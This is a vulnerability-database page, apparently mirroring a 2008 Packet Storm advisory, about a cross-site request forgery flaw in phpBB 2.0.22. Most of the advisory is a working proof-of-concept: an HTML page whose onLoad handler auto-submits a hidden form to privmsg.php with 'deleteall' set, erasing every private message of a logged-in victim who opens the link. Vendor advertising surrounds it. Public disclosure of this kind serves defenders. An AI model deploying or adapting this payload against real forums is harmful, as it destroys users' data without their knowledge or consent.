Lucene search

phpbb2022-xsrf.txt

🗓️ 25 Jan 2008 00:00:00Reported by NBBNType

packetstorm🔗 packetstormsecurity.com👁 14 Views

phpBB 2.0.22 Remote PM Delete XSRF Vulnerability, allows attacker to delete victim's PMs via crafted lin

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`################################################################  
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability   
by NBBN Type: Cross-Site Request Forgery  
Founded: December 2007   
################################################################  
  
  
An attacker can send a link via pm to a site with the follow html code to a   
victim and all victim's pm's are going to be deleted when he click the link.   
######Code##########################################################  
  
<html>  
<head>  
</head>  
<body onLoad=javascript:document.xsrf.submit()>  
  
<form action="http://[site]/phpBB2/privmsg.php?folder=inbox" method="post"   
name="xsrf">  
<input type="hidden" name="mode" value="" />  
<input type="hidden" name="deleteall" value="true" />  
<input type="hidden" name="confirm" value="Yes">  
  
</body>  
</html>  
#####################################################################  
  
  
######Vuln Versions:#####################  
  
I've tested it only on 2.0.22 but I think that all versions of 2 are vuln.   
  
  
  
  
(Sorry my bad english :-) )  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

25 Jan 2008 00:00Current

7.4High risk

Vulners AI Score7.4